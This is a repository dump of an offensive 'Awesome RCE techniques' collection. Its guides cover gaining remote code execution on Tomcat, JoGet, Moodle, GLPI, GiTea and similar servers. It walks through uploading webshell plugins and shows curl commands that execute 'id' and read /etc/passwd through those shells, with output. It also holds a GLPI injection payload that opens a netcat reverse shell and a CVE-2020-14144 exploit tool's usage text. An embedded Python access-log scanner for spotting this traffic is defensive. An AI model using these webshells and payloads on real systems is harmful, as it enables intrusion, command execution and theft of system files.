gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```

### Step 3: The interactive console

When your webshell is active, you can use the interactive [console.py](https://github.com/p0dalirius/Tomcat-application-webshell/console.py) to execute commands and download remote files.

https://user-images.githubusercontent.com/79218792/168489455-023b52c5-e8a9-4cd9-96ca-f26c14304236.mp4

## References
- https://tomcat.apache.org/
- https://github.com/p0dalirius/Tomcat-application-webshell/
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/compile.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/compile.png
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/exec_code_web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/exec_code_web.png
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/manager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/manager.png
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/upload_a_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/upload_a_plugin.png
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/webshell_uploaded.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/imgs/webshell_uploaded.png
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Apache Tomcat - Deploy an Application",
    "work_in_progress": false,
    "references": [
        "https://tomcat.apache.org/",
        "https://github.com/p0dalirius/Tomcat-application-webshell/"
    ]
}
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM tomcat:9.0.62-jdk11-openjdk-slim-buster

# https://octopus.com/blog/deployable-tomcat-docker-containers

RUN mv /usr/local/tomcat/webapps /usr/local/tomcat/webapps2 ;\
    mv /usr/local/tomcat/webapps.dist /usr/local/tomcat/webapps

COPY ./files/context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml
COPY ./files/tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml

CMD ["catalina.sh", "run"]
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_tomcat_upload_plugin
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):8080 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):8080 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/files/context.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Frameworks/Apache-Tomcat/techniques/Deploy-an-application/test_env/files/tomcat-users.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Frameworks/JBoss/README.md:
--------------------------------------------------------------------------------
# JBoss

JBoss is an open-source platform that helps enterprises implement Java EE applications. It is an integrated development environment and middleware software for the further development and enhancement of applications. JBoss is platform friendly and quite easy to use.

## Techniques to achieve RCE on JBoss

### With admin credentials

- [Upload a plugin](./techniques/Upload-a-plugin/README.md)

https://github.com/joaomatosf/jexboss
--------------------------------------------------------------------------------
/Frameworks/JBoss/techniques/Upload-a-plugin/README.md:
--------------------------------------------------------------------------------
# JBoss - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on JBoss.

## Exploitation

### Step 1: Whitelist your IP in the API

## References
- https://github.com/joaomatosf/jexboss
--------------------------------------------------------------------------------
/Frameworks/JBoss/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "JBoss - Upload a plugin",
    "work_in_progress": false,
    "references": [
        "https://github.com/joaomatosf/jexboss"
    ]
}
--------------------------------------------------------------------------------
/Frameworks/JBoss/techniques/Upload-a-plugin/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM quay.io/wildfly/wildfly
RUN /opt/jboss/wildfly/bin/add-user.sh admin admin --silent
CMD ["/opt/jboss/wildfly/bin/standalone.sh", "-b", "0.0.0.0", "-bmanagement", "0.0.0.0"]
--------------------------------------------------------------------------------
/Frameworks/JBoss/techniques/Upload-a-plugin/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_jboss
PORT := 9990

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):9990 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):9990 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Frameworks/JoGet/README.md:
--------------------------------------------------------------------------------
# JoGet

Joget DX is a new and next generation open source low-code platform for faster, simpler digital transformation (DX).

## Techniques to achieve RCE on JoGet

### With admin credentials

- [Upload a plugin](./techniques/Upload-a-plugin/README.md)
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/README.md:
--------------------------------------------------------------------------------
# JoGet - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on JoGet.

## Exploitation

### Step 1: Whitelist your IP in the API

First of all, you will need to whitelist your IP in the API (or put `*` to match every source IP). This will allow you to perform requests on the `/jw/web/json` endpoint.

- **API Domain Whitelist**: `*`
- **API IP Whitelist**: `*`

![](./imgs/ip_whitelist_api.png)

### Step 2: Upload the webshell plugin

Go to the "Manage plugins" page, at http://127.0.0.1:8000/jw/web/console/setting/plugin, and click on "Upload plugin":

![](./imgs/manage_plugins_interface.png)

Compile the webshell plugin or download a release here: https://github.com/p0dalirius/JoGet-plugin-webshell/. Then choose the JAR file of the [webshell application](https://github.com/p0dalirius/JoGet-plugin-webshell) and click on "Upload":

![](./imgs/upload_a_plugin.png)

### Step 3.1: Executing commands

You can now execute commands by sending a GET or POST request to http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service' --data "action=exec&cmd=id"
{"stdout":"uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat),0(root),27(sudo)\n","stderr":"","exec":["/bin/bash","-c","id"]}
```

You can also access it with a GET request from a browser:

![](./imgs/exec_code_web.png)

### Step 3.2: Downloading files

You can also download remote files by sending a GET or POST request to http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service with `action=download&path=/etc/passwd`:

```sh
$ curl -X POST 'http://127.0.0.1:8000/jw/web/json/plugin/podalirius.WebShell/service' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1000:1000::/home/tomcat:/bin/sh
```

### Step 4: The interactive console

When your webshell is active, you can use the interactive [console.py](https://raw.githubusercontent.com/p0dalirius/JoGet-plugin-webshell/master/console.py) to execute commands and download remote files.
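The webshell endpoints documented in this repository (the WordPress `wp_webshell.php` plugin, the Tomcat `/webshell/api` WAR, the JoGet `podalirius.WebShell/service` plugin and the Moodle `moodle_webshell/webshell.php` plugin) all take the same `action=exec` / `action=download` query, and the Tomcat CVE-2017-12615 technique is a `PUT` of a `.jsp` resource. Both leave a distinctive trace in the web server access log, which is where a defender would look for them. The script below is an added example written for this page, not code from the Awesome-RCE-techniques repository or from the webshell plugins it links to: it parses combined-format access log lines (the format Apache httpd and Tomcat's AccessLogValve write) and flags requests to those endpoints and PUTs of JSP files. The sample log lines are constructed, and the `classify` and `scan` function names are this example's own.

```python
"""Flag webshell-plugin traffic and JSP PUT uploads in combined access logs.

Added example for this page; not code from the Awesome-RCE-techniques
repository or the webshell plugins it links to. The sample log lines are
constructed, and the endpoint list comes from the techniques on this page.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format as written by Apache httpd and Tomcat's AccessLogValve.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Webshell endpoints described on this page, matched as path suffixes so the
# deployment prefix (/wordpress/, a Tomcat context path, ...) does not matter.
WEBSHELL_PATHS = (
    "/wp-content/plugins/wp_webshell/wp_webshell.php",  # WordPress plugin
    "/webshell/api",                                    # Tomcat WAR
    "/jw/web/json/plugin/podalirius.WebShell/service",  # JoGet plugin
    "/local/moodle_webshell/webshell.php",              # Moodle plugin
)

# CVE-2017-12615: a PUT whose target is a .jsp resource (the page's example
# uses a trailing "/" after the extension, so the slash is optional here).
JSP_PUT_RE = re.compile(r"\.jsp/?$", re.IGNORECASE)


def classify(line):
    """Return a finding dict for a suspicious access log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method = m.group("method")
    url = urlsplit(m.group("target"))
    query = parse_qs(url.query)
    base = {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "method": method,
        "path": url.path,
        "status": int(m.group("status")),
    }
    for suffix in WEBSHELL_PATHS:
        if url.path.endswith(suffix):
            # POST bodies are not written to the access log, so a bare POST to
            # the endpoint is reported too; action and argument are only
            # visible when they were sent in the query string.
            action = (query.get("action") or [None])[0]
            argument = (query.get("cmd") or query.get("path") or [None])[0]
            return dict(base, kind="webshell_endpoint", action=action, argument=argument)
    if method == "PUT" and JSP_PUT_RE.search(url.path):
        return dict(base, kind="jsp_put", action=None, argument=None)
    return None


def scan(log_text):
    """Classify every line of an access log and return the findings in order."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        finding = classify(line)
        if finding is not None:
            finding["line"] = lineno
            findings.append(finding)
    return findings


# Constructed sample: three webshell requests, one JSP PUT and one benign hit
# on the WordPress plugin-install page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2022:10:01:02 +0000] "GET /wordpress/wp-content/plugins/wp_webshell/wp_webshell.php?action=exec&cmd=id HTTP/1.1" 200 83 "-" "curl/7.81.0"
10.0.0.5 - - [12/May/2022:10:01:09 +0000] "POST /webshell/api HTTP/1.1" 200 101 "-" "python-requests/2.27.1"
10.0.0.7 - - [12/May/2022:10:02:30 +0000] "PUT /shell.jsp/ HTTP/1.1" 201 0 "-" "curl/7.81.0"
192.168.1.20 - - [12/May/2022:10:03:00 +0000] "GET /wordpress/wp-admin/plugin-install.php HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2022:10:03:41 +0000] "GET /jw/web/json/plugin/podalirius.WebShell/service?action=download&path=/etc/passwd HTTP/1.1" 200 1720 "-" "curl/7.81.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} {f['method']} {f['path']} "
              f"action={f['action']} arg={f['argument']} status={f['status']}")
```

Two points about reading the output: a `201` on a `PUT` to a `.jsp` path means the upload was accepted, which a Tomcat whose DefaultServlet keeps its default read-only setting would have refused; and because POST bodies never reach the access log, the endpoint match alone is the alert, with the `action` and its argument only recoverable for requests that used the query string.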
https://user-images.githubusercontent.com/79218792/158264654-df612180-9de5-4b5b-b3a2-ad22ae05b889.mp4

## References
- https://github.com/p0dalirius/JoGet-plugin-webshell
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/demo.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/demo.mp4
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/exec_code_web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/exec_code_web.png
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/ip_whitelist_api.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/ip_whitelist_api.png
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/manage_plugins_interface.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/manage_plugins_interface.png
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/plugin_installed_and_ready.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/plugin_installed_and_ready.png
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/upload_a_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/JoGet/techniques/Upload-a-plugin/imgs/upload_a_plugin.png
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "JoGet - Upload a plugin",
    "work_in_progress": false,
    "references": [
        "https://github.com/p0dalirius/JoGet-plugin-webshell"
    ]
}
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM jogetworkflow/joget-community:7.0.29
--------------------------------------------------------------------------------
/Frameworks/JoGet/techniques/Upload-a-plugin/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_joget_upload_plugin
PORT := 8080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):8080 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):8080 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Frameworks/README.md:
--------------------------------------------------------------------------------
# Frameworks

## Softwares

- [**Apache-Tomcat**: (2 techniques)](./Apache-Tomcat/)
- [**JBoss**: (1 technique)](./JBoss/)
- [**JoGet**: (1 technique)](./JoGet/)
- [**WildFly**: (1 technique)](./WildFly/)
--------------------------------------------------------------------------------
/Frameworks/WildFly/README.md:
--------------------------------------------------------------------------------
# WildFly

WildFly, formerly known as JBoss AS, or simply JBoss, is an application server written by JBoss, now developed by Red Hat. WildFly is written in Java and implements the Java Platform, Enterprise Edition specification. It runs on multiple platforms. WildFly is free and open-source software, subject to the requirements of the GNU Lesser General Public License, version 2.1.

## Techniques to achieve RCE on WildFly

### With admin credentials

- [Deploy an application](./techniques/Deploy-an-application/README.md)
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/README.md:
--------------------------------------------------------------------------------
# WildFly - Deploy an Application

## Requirements

- A valid **username and password** of a user with **admin rights** on WildFly.

## Exploitation

## References
-
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console.png
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Frameworks/WildFly/techniques/Deploy-an-application/imgs/wildfly_console_login.png
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/technique.json:
--------------------------------------------------------------------------------
{
    "name": "WildFly - Deploy an Application",
    "work_in_progress": false,
    "references": []
}
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM quay.io/wildfly/wildfly

RUN /opt/jboss/wildfly/bin/add-user.sh admin admin --silent

CMD ["/opt/jboss/wildfly/bin/standalone.sh", "-b", "0.0.0.0", "-bmanagement", "0.0.0.0"]
--------------------------------------------------------------------------------
/Frameworks/WildFly/techniques/Deploy-an-application/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_wildfly
4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 8080:8080 -p 9990:9990 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 8080:8080 -p 9990:9990 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/README.md: -------------------------------------------------------------------------------- 1 | # Moodle 2 | 3 | Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Developed on pedagogical principles, Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors. 4 | 5 | - https://moodle.org/ 6 | 7 | ## Techniques to achieve RCE on Moodle 8 | 9 | ### With admin credentials 10 | 11 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 12 | -------------------------------------------------------------------------------- /Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Moodle - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Moodle. 

## Exploitation

### Step 1.1: Upload the webshell plugin

Go to the "Site administration --> Install plugins" page, at http://127.0.0.1:10080/admin/tool/installaddon/index.php, and click on "_Choose a file_":

![](./imgs/upload_and_install.png)

### Step 1.2: Plugin successfully uploaded

Press the buttons on the various pages until you get a message stating that your plugin was successfully uploaded:

![](./imgs/plugin_successfully_uploaded.png)

### Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/local/moodle_webshell/webshell.php with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://127.0.0.1:10080/local/moodle_webshell/webshell.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}
```

You can also access it with a GET request from a browser:

![](./imgs/exec_code_web.png)

### Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/local/moodle_webshell/webshell.php with `action=download&path=/etc/passwd`:

```sh
$ curl -X POST 'http://127.0.0.1:10080/local/moodle_webshell/webshell.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
```

You can also download a remote file from a browser with a GET request:

![](./imgs/download_file_web.png)

### Step 3: The interactive console

Once your webshell is active, you can use the interactive [console.py](console.py) to execute commands and download remote files.

https://user-images.githubusercontent.com/79218792/169657310-dee340d6-19c0-4192-bcd1-ac8b9b29b731.mp4

## References
- https://github.com/joaomatosf/jexboss
--------------------------------------------------------------------------------
/Learning-Management-Systems-(LMS)/Moodle/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Moodle - Upload a plugin",
    "work_in_progress": false,
    "references": [
        "https://github.com/joaomatosf/jexboss"
    ]
}
--------------------------------------------------------------------------------
/Learning-Management-Systems-(LMS)/README.md:
--------------------------------------------------------------------------------
# Learning-Management-Systems-(LMS)

## Softwares

- [**Moodle**: (1 technique)](./Moodle/)
--------------------------------------------------------------------------------
/Other/GLPI/README.md:
--------------------------------------------------------------------------------
# GLPI

Gestionnaire Libre de Parc Informatique (GLPI) is a free asset and IT management software package that provides ITIL service desk features, license tracking and software auditing.

- Official site: https://glpi-project.org/
- Source code: https://github.com/glpi-project/glpi/

## Techniques to achieve RCE with GLPI

### Latest version and all versions above GLPI 0.90

- [Install shellcommand Plugin - GLPI Remote Code Execution (RCE) (Authenticated)](techniques/GLPI_shellcommand_plugin_authenticated_rce/README.md)
--------------------------------------------------------------------------------
/Other/GLPI/techniques/GLPI_shellcommand_plugin_authenticated_rce/README.md:
--------------------------------------------------------------------------------
# GLPI-RCE-Authenticated
How to achieve RCE as a GLPI administrator.

"Gestionnaire Libre de Parc Informatique (GLPI) is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing."

https://github.com/glpi-project/glpi

## Requirements

You need to be a super administrator of GLPI to add the plugin and perform the RCE.
The default login is **glpi / glpi**.

## Exploitation

The technique consists in installing a plugin that lets administrators run system commands such as ping or tracert from the web interface, and diverting it to run something else, for example a reverse shell.

First, you must add a "GLPI Network" registration key in the general settings of GLPI; this is what grants the right to add plugins from the marketplace. You only have to create a free account on the GLPI Network site and copy-paste the key:
https://services.glpi-network.com/register

![](https://i.imgur.com/CuNnAFw.png)

![](https://i.imgur.com/o4HQRnH.png)

In the Marketplace (``/glpi/front/marketplace.php``), add the plugin named "Launch Shell Commands":

![](https://i.imgur.com/HO9rTMo.png)

Edit the ping command page: ``/glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1``

Enter a random string in the tag field; in the parameters field you can run anything as a command by prefixing it with a semicolon.
You can use this payload for a reverse shell:
```sh
;nc -c /bin/bash localhost 1234
```

It is simply an "exec" of all the arguments, there are no filters: we control the variable `$commandToExec`.

![image](https://user-images.githubusercontent.com/69597623/189349689-45af6cd0-9611-4a85-b561-4219da114738.png)

![](https://i.imgur.com/0vuQnGF.png)

Add a ping command group: ``/glpi/marketplace/shellcommands/front/commandgroup.php``

![](https://i.imgur.com/CKQkOS2.png)

Finally, to execute the payload, go to ``/glpi/marketplace/shellcommands/front/advanced_execution.php`` and select the ping command group, a category and a device from the list (if you don't have one, you can create one in Assets):

![](https://i.imgur.com/3ZnE7eJ.png)
![](https://i.imgur.com/zlns3aD.png)
--------------------------------------------------------------------------------
/Other/GiTea/README.md:
--------------------------------------------------------------------------------
# GiTea

GiTea is an open-source forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, wikis and code review. It supports self-hosting but also provides a free public first-party instance.

Gitea is a community managed lightweight code hosting solution written in Go. It is published under the MIT license.

- **Official Site:** https://gitea.io/en-us/
- **Source Code:** https://github.com/go-gitea/

## Techniques to achieve RCE with GiTea

### With user credentials

- [User with git hooks activated](./techniques/User-with-git-hooks-activated/README.md)
--------------------------------------------------------------------------------
/Other/GiTea/techniques/User-with-git-hooks-activated/README.md:
--------------------------------------------------------------------------------
# GiTea - User with git hooks activated

## Requirements

A valid username and password of an account with the "May create git hooks" right.

![](./imgs/may_create_git_hooks.png)

## Description

The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the `ENABLE_GIT_HOOKS` line in the config file). This vulnerability was found by [Niklas Goerke](https://twitter.com/Niklas974) in April 2020.

**NOTE**: The vendor has indicated this is not a vulnerability and states "_This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides._"

In order to exploit this vulnerability/feature, we need a GiTea account with the "_May create git hooks_" right activated.

A [pull request](https://github.com/go-gitea/gitea/pull/13058) was opened and the change was released in version 1.13.0.

## Exploitation

In order to successfully exploit this vulnerability/feature, the target GiTea server version should be between version 1.1.0 and version 1.13, and you need a valid account (username, password) with the "_May create git hooks_" right activated.

![Account with "_May create git hooks_" rights activated](./imgs/may_create_git_hooks.png)

From a system administration point of view, the gitea process looks like this before the exploitation:

![Service status before exploit](./imgs/gitea_service_before_exploit.png)

First of all, we need to create a repository on the GiTea web interface, using our account. We create the repository and go to `Settings -> Git Hooks -> Post Receive Hook`. In this hook you can write a shell script that will be executed after a new commit is received.

![Post Receive Hook](./imgs/post_receive_hook.png)

Now we create a temporary directory on our attacking machine and push to the remote repository. This triggers the `Post Receive Hook` script.

```sh
touch README.md
git init
git add README.md
git commit -m "Initial commit"
git remote add origin https://vulnserver/testuser/vuln.git
git push -u origin master
```

After we pushed the commit to the remote repository, it triggers the `Post Receive Hook` script and we get a reverse shell!

![Reverse Shell](./imgs/gitea_reverse_shell.png)

After the exploitation, a system administrator can easily see our detached reverse shell among the child processes of GiTea:

![Service status after exploit](./imgs/gitea_service_after_exploit.png)

## Exploit tool

I wrote a tool to automatically exploit this vulnerability, [CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce):

```
$ ./CVE-2020-14144-GiTea-git-hooks-rce.py -h
  _____ _ _______
 / ____(_)__ __|           CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` |  Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
 \_____|_| |_|\___|\__,_|  GiTea versions >= 1.1.0 to <= 1.12.5

usage: CVE-2020-14144-GiTea-git-hooks-rce.py [-h] [-v] -t TARGET -u USERNAME -p PASSWORD [-I REV_IP] [-P REV_PORT]
                                             [-f PAYLOAD_FILE]

CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks.

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Increase verbosity.
  -t TARGET, --target TARGET
                        Target host (http://..., https://... or domain name)
  -u USERNAME, --username USERNAME
                        GiTea username
